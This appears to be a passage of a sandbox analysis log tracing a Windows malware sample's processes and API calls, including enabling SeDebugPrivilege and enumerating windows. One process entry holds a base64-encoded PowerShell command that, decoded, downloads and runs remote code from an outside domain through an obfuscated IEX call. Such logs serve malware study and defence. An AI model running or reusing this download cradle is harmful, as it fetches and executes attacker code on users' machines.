	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 614
	os_tid = 0xfcc

	[0435.222] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 717
	os_tid = 0x1628


Thread:
	id = 751
	os_tid = 0x1708


Thread:
	id = 1986
	os_tid = 0x26f0


Thread:
	id = 1992
	os_tid = 0x2708


Thread:
	id = 1994
	os_tid = 0x2714


Thread:
	id = 2074
	os_tid = 0x2458


Process:
	id = "123"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5da90000"
	os_pid = "0x11e0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 618
	os_tid = 0xc0c

	[0435.118] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0551.847] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0558.349] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0558.350] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0558.350] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0558.350] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0576.295] GetVersionExW (in: lpVersionInformation=0xedc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0576.297] GetVersionExW (in: lpVersionInformation=0xedc20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedc20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0576.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0576.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0576.311] GetVersionExW (in: lpVersionInformation=0xed990*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed990*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0576.312] SetErrorMode (uMode=0x1) returned 0x1
	[0576.313] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xedaf0 | out: lpFileInformation=0xedaf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0577.822] SetErrorMode (uMode=0x1) returned 0x1
	[0577.826] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xedd60 | out: lpdwHandle=0xedd60) returned 0x94c
	[0577.828] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d172d8 | out: lpData=0x2d172d8) returned 1
	[0577.830] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedcd8, puLen=0xedcd0 | out: lplpBuffer=0xedcd8*=0x2d17374, puLen=0xedcd0) returned 1
	[0577.833] lstrlenW (lpString="䅁") returned 1
	[0577.843] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d17450, puLen=0xedc40) returned 1
	[0577.844] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0577.846] CoTaskMemAlloc (cb=0x2e) returned 0x256980
	[0577.846] lstrcpyW (in: lpString1=0x256980, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0577.847] CoTaskMemFree (pv=0x256980) 
	[0577.847] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d174a4, puLen=0xedc40) returned 1
	[0577.847] lstrlenW (lpString="System.Management.Automation") returned 28
	[0577.847] CoTaskMemAlloc (cb=0x3c) returned 0x189860
	[0577.847] lstrcpyW (in: lpString1=0x189860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0577.847] CoTaskMemFree (pv=0x189860) 
	[0577.848] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d17500, puLen=0xedc40) returned 1
	[0577.848] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0577.848] CoTaskMemAlloc (cb=0x20) returned 0x254d80
	[0577.848] lstrcpyW (in: lpString1=0x254d80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0577.848] CoTaskMemFree (pv=0x254d80) 
	[0577.848] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d17540, puLen=0xedc40) returned 1
	[0577.848] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0577.848] CoTaskMemAlloc (cb=0x44) returned 0x189860
	[0577.848] lstrcpyW (in: lpString1=0x189860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0577.848] CoTaskMemFree (pv=0x189860) 
	[0577.848] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d175a8, puLen=0xedc40) returned 1
	[0577.848] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0577.848] CoTaskMemAlloc (cb=0x76) returned 0x1ef660
	[0577.848] lstrcpyW (in: lpString1=0x1ef660, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0577.848] CoTaskMemFree (pv=0x1ef660) 
	[0577.848] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d17644, puLen=0xedc40) returned 1
	[0577.848] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0577.848] CoTaskMemAlloc (cb=0x44) returned 0x189860
	[0577.848] lstrcpyW (in: lpString1=0x189860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0577.849] CoTaskMemFree (pv=0x189860) 
	[0577.849] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d176a8, puLen=0xedc40) returned 1
	[0577.849] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0577.849] CoTaskMemAlloc (cb=0x58) returned 0x1a87e0
	[0577.849] lstrcpyW (in: lpString1=0x1a87e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0577.849] CoTaskMemFree (pv=0x1a87e0) 
	[0577.849] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d17724, puLen=0xedc40) returned 1
	[0577.849] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0577.849] CoTaskMemAlloc (cb=0x20) returned 0x254d80
	[0577.849] lstrcpyW (in: lpString1=0x254d80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0577.849] CoTaskMemFree (pv=0x254d80) 
	[0577.849] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x2d173cc, puLen=0xedc40) returned 1
	[0577.849] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0577.849] CoTaskMemAlloc (cb=0x66) returned 0x253450
	[0577.849] lstrcpyW (in: lpString1=0x253450, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0577.849] CoTaskMemFree (pv=0x253450) 
	[0577.849] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x0, puLen=0xedc40) returned 0
	[0577.849] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x0, puLen=0xedc40) returned 0
	[0577.850] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedc48, puLen=0xedc40 | out: lplpBuffer=0xedc48*=0x0, puLen=0xedc40) returned 0
	[0577.850] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedc18, puLen=0xedc10 | out: lplpBuffer=0xedc18*=0x2d17374, puLen=0xedc10) returned 1
	[0577.851] CoTaskMemAlloc (cb=0x204) returned 0x1f9660
	[0577.851] VerLanguageNameW (in: wLang=0x0, szLang=0x1f9660, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0577.852] CoTaskMemFree (pv=0x1f9660) 
	[0577.853] VerQueryValueW (in: pBlock=0x2d172d8, lpSubBlock="\\", lplpBuffer=0xedc68, puLen=0xedc60 | out: lplpBuffer=0xedc68*=0x2d17300, puLen=0xedc60) returned 1
	[0579.716] GetCurrentProcessId () returned 0x11e0
	[0579.732] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xecb90 | out: lpLuid=0xecb90*(LowPart=0x14, HighPart=0)) returned 1
	[0579.735] GetCurrentProcess () returned 0xffffffffffffffff
	[0579.736] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xecbb0 | out: TokenHandle=0xecbb0*=0x1c8) returned 1
	[0579.737] AdjustTokenPrivileges (in: TokenHandle=0x1c8, DisableAllPrivileges=0, NewState=0x2d1ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0579.738] CloseHandle (hObject=0x1c8) returned 1
	[0579.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11e0) returned 0x1c8
	[0581.573] EnumProcessModules (in: hProcess=0x1c8, lphModule=0x2d1abb8, cb=0x200, lpcbNeeded=0xedbc8 | out: lphModule=0x2d1abb8, lpcbNeeded=0xedbc8) returned 1
	[0581.575] GetModuleInformation (in: hProcess=0x1c8, hModule=0x13f370000, lpmodinfo=0x2d1ae28, cb=0x18 | out: lpmodinfo=0x2d1ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0581.576] CoTaskMemAlloc (cb=0x804) returned 0x25cfd0
	[0581.576] GetModuleBaseNameW (in: hProcess=0x1c8, hModule=0x13f370000, lpBaseName=0x25cfd0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0581.576] CoTaskMemFree (pv=0x25cfd0) 
	[0581.577] CoTaskMemAlloc (cb=0x804) returned 0x25cfd0
	[0581.577] GetModuleFileNameExW (in: hProcess=0x1c8, hModule=0x13f370000, lpFilename=0x25cfd0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0581.577] CoTaskMemFree (pv=0x25cfd0) 
	[0581.578] CloseHandle (hObject=0x1c8) returned 1
	[0581.586] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x11e0) returned 0x1c8
	[0581.587] GetExitCodeProcess (in: hProcess=0x1c8, lpExitCode=0xedcf8 | out: lpExitCode=0xedcf8*=0x103) returned 1
	[0581.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d1b088, Length=0x20000, ResultLength=0xedcc0 | out: SystemInformation=0x12d1b088, ResultLength=0xedcc0*=0x34d98) returned 0xc0000004
	[0581.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d3b0b8, Length=0x37598, ResultLength=0xedcc0 | out: SystemInformation=0x12d3b0b8, ResultLength=0xedcc0*=0x34d98) returned 0x0
	[0583.135] EnumWindows (lpEnumFunc=0x2aa66ac, lParam=0x0) 
	[0585.399] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0590.652] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x558
	[0593.895] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0596.394] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0597.672] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0599.247] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x538
	[0601.229] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0601.230] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x778
	[0601.231] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x778
	[0602.781] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0603.337] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0603.339] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0604.615] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0606.160] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0607.734] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0607.735] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0607.736] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0608.688] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x460
	[0609.267] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0609.270] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x4d0
	[0609.276] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x3a8
	[0609.277] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1bd0
	[0609.278] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1bfc
	[0610.712] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1a78
	[0610.715] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1b90
	[0610.717] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1b04
	[0611.573] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1b34
	[0611.575] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1b64
	[0611.576] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1bb0
	[0611.578] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1acc
	[0611.578] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1a2c
	[0612.850] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x19a8
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1944
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x18c8
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x18ac
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x18ec
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1898
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xc98
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x153c
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1808
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x12a4
	[0613.883] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1740
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x16c4
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1820
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x16ac
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1858
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1664
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10b4
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10ac
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x10ec
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1068
	[0613.884] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x17e0
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x102c
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x17a4
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1050
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1694
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1770
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1720
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x165c
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1578
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x16c0
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x161c
	[0613.885] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1638
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x15c8
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1554
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1674
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1520
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x14bc
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xf8c
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xe9c
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1434
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x14ec
	[0613.886] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xfcc
	[0613.887] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x12ac
	[0613.887] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x1484
	[0613.887] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x934
	[0613.887] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xc0c
	[0613.888] GetWindow (hWnd=0x10622, uCmd=0x4) returned 0x0
	[0613.888] IsWindowVisible (hWnd=0x10622) returned 0
	[0613.888] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0xb08
	[0613.889] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xeda20 | out: lpdwProcessId=0xeda20) returned 0x948
